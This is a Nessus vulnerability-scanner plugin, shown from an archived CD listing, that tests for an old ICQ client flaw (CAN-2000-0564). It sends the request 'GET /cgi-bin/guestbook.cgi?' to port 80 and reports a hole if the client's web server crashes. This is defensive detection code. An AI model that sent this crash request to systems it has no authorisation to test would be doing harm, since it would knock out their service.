home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / icq_crash.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  92 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6. #
  7. if(description)
  8. {
  9.  script_id(10347);
  10.  script_bugtraq_id(1463);
  11.  script_cve_id("CAN-2000-0564");
  12.  script_version ("$Revision: 1.12 $");
  13.  
  14.  
  15.  name["english"] = "ICQ Denial of Service attack";
  16.  name["francais"] = "DΘni de service ICQ";
  17.  
  18.  script_name(english:name["english"],
  19.            francais:name["francais"]);
  20.  
  21. desc["english"] = "
  22. It was possible to crash the remote ICQ client
  23. by connecting to port 80 and sending the request:
  24.  
  25.     GET /cgi-bin/guestbook.cgi?
  26.     
  27.     
  28. An attacker may use this problem to prevent you from
  29. working properly.
  30.  
  31. Solution: deactivate the webserver service of the client
  32.  
  33. Risk factor : Low";
  34.  
  35. desc["francais"] = "
  36. Il s'est avΘrΘ possible de faire planter le client ICQ 
  37. distant en se connectant au port 80 et en faisant la
  38. requΦte :
  39.  
  40.     GET /cgi-bin/guestbook.cgi?
  41.  
  42. Un pirate peut utiliser ce problΦme pour vous empecher
  43. de travailler correctement.
  44.  
  45.  
  46. Solution : dΘsactivez le service 'serveur web' offert par ce client
  47.  
  48. Facteur de risque : Moyen";
  49.  
  50.  script_description(english:desc["english"]);
  51.  
  52.  summary["english"] = "ICQ denial of service";
  53.  summary["francais"] = "DΘni de service ICQ";
  54.  script_summary(english:summary["english"]);
  55.  
  56.  script_category(ACT_DENIAL);
  57.  
  58.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison");
  59.  family["english"] = "Denial of Service";
  60.  family["francais"] = "DΘni de service";
  61.  script_family(english:family["english"], francais:family["francais"]);
  62.  script_require_ports(80, "Services/www");
  63.  script_dependencies("find_service.nes");
  64.  exit(0);
  65. }
  66.  
  67. #
  68. # The script code starts here
  69. #
  70.  
  71. include("http_func.inc");
  72. port = get_http_port(default:80);
  73.  
  74.  
  75. if (get_port_state(port))
  76. {
  77.   if(http_is_dead(port:port))exit(0);
  78.   
  79.   soc = http_open_socket(port);
  80.   if(soc)
  81.   {
  82.     req = http_get(item:"/cgi-bin/guestbook.cgi?", port:port);
  83.     send(socket:soc, data:req);
  84.     r = http_recv(socket:soc);
  85.     http_close_socket(soc);
  86.  
  87.    
  88.     if(http_is_dead(port:port))security_hole(port);
  89.   }
  90. }
  91.  
  92.